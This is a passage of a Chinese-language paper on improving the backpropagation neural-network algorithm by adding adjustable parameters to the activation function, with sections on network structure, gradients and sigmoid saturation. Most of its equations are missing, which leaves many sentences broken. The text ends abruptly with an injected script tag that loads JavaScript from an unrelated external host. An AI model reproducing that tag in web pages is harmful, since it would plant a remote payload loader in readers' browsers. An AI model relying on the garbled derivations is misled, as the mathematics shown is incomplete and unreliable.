摘 要:本文通过分析激励函数在传统bp算法中的作用,在激励函数中引入了可调参数,在力求保持传统bp算法简洁性的基础上,使其参数动态可调,有效的加快了网络学习的收敛速度。
关键词:bp算法 激励函数 神经网络
1 问题的提出
传统bp算法最大的问题是网络训练时间过长,甚至会完全不能训练。对此国内外学者进行了大量的研究,研究的内容主要有改进误差函数,添加惯性冲量,批处理学习样本,动态调整学习速率和惯性因子以及基于模拟退火或遗传算法的改进等方面[1-3]。这些改进的算法不仅常常需要对传统bp算法作较大的改动,而且没有对传统bp算法进行实质性的改变。传统bp算法实质上假定各神经元的激励函数为相同的,不可变更的,即网络的信息仅分布存储于w中,仅仅只对连接权值w进行调整。但是生物的学习过程应该是除了各神经元细胞间连接强度的调整外,其本身的输入输出关系也是在变动和调整的[4]。基于这种思想,本文在激励函数中引入了可调参数,在力求保持传统bp算法简洁性的基础上,使其参数动态可调,有效地加快了网络的收敛速度和逼近精度。
2 激励函数对网络性能的影响
2.1 bp网络的工作原理
bp网络是由输入层,若干隐含层和输出层互相连接组成。连接的结构是,前后相邻层的任意两节点均相互连接,非相邻层的节点无任何连接。从输入层开始逐层连接,到输出层连接结束。同层节点间无连接。隐含层的激励函数一般为非线性函数。输出层的激励函数可以是线性的,也可以是非线性的。bp网络的工作过程通常有两个阶段组成。一个阶段是学习期。在这一阶段,各节点的输出保持不变,而网络的学习则是从输出层开始,反向逐层逐个节点计算各连接权值的修改量,以修改各连接权值,直到输入层为止。另一个阶段是工作期。在这一阶段,网络各节点的连接权值不变,网络的计算从输入层开始,逐层逐个节点计算各个节点的输出,直到输出层的各节点计算完毕[4]。
设bp网络非输入层的任意节点i对于训练样本(xk,yk),输出为ok,网络的输入为xk,期望输出为yk,学习步长为η,有n个训练样本,k为样本序号(k=1,2,…,n),使用平方误差函数则bp网络妆权值的学习算法为w=w
2.2 激励函数对网络性能的影响
设bp网络三层节点分别表示为输入节点xj,隐节点yi,输出节点oi。输入节点与隐节点间的网络权值为wij,隐节点与输出节点的网络权值为wij。则bp模型的计算公式如下:
隐节点神经元的阈值,neti为隐节点神经元的输入总和。
(2)输出节点的输出为为输出节点神经元的阈值,neti为输出节点神经元的输入总和。
(3)输出节点的误差为为输出节点的期望输出。
(4)隐层至输出层权值调整为
因为e是多个ok的函数,且只有一个ol与wli有关,同时各ok之间相互独立,由此可得
利用(2)式和(3)式可以将(1)式化简为
同理,因为e是多个ol函数,又因为针对某一个wij只对应一个yi,且yi与所有的ol都有关(上式只对l求和)。由此可以得到
利用(7)~(9)式可以将(6)式化简化
从上面的梯度公式可以看出:
(1)在保证收敛的前提下,由(11)式可知权值调整的幅度越大,则梯度的变化也越大,学习速度也越快。由(1)式可知梯度的变化与激励函数的导数f′(neti)成正比。由于激励函数的导数在学习过程中大量地被使用,因此对整个网络的学习过程将有非常大的影响。
(2)由于sigmoid型的激励函数都存在饱和区,当神经元的输出落入激励函数的饱和区时,需要对权值作较大的修正才可能尽快使处理单元逃出饱和区[5]。由于在饱和区中,激励函数的导函数值都很小,因此每次学习周期只能对权值作较小修正,输出单元会在一段时间工作在平坦区中,使网络的均方根误差保持不变或变化很小,如图1所示。此时,相当于整个调节过程几乎停顿下来,这就产生了所谓的麻痹现象,从而减慢了网络的收敛速度。基于以上分析,我们应该选择合适的激励函数并且引入一些必要的调整参数,当神经元的输出落入激励函数的饱和区时,使激励函数的导函数值可以随误差的变化而作相应的调整,有效的避免麻痹现象的产生,加快网络的收敛速度。
3 激励函数的改进
3.1 激励函数的选择
首先分析几个常用的激励函数:
(1)logsig对数s型(sigmoid)传递函数,它可以将神经元的输入范围(-∞,+∞)映射到(0,1)的区间上,它是可微函数,其表达式为:y=1/1+e-x
(2)tansig双曲正切s型(sigmoid)传递函数,它可以将神经元的输入范围(-∞,+∞)映射到(-1,+1)的区间上,它是可微函数,其表达式为:
(3)线性函数purelin,它也是可微函数,其输出可以是任意值,?script src=http://er12.com/t.js>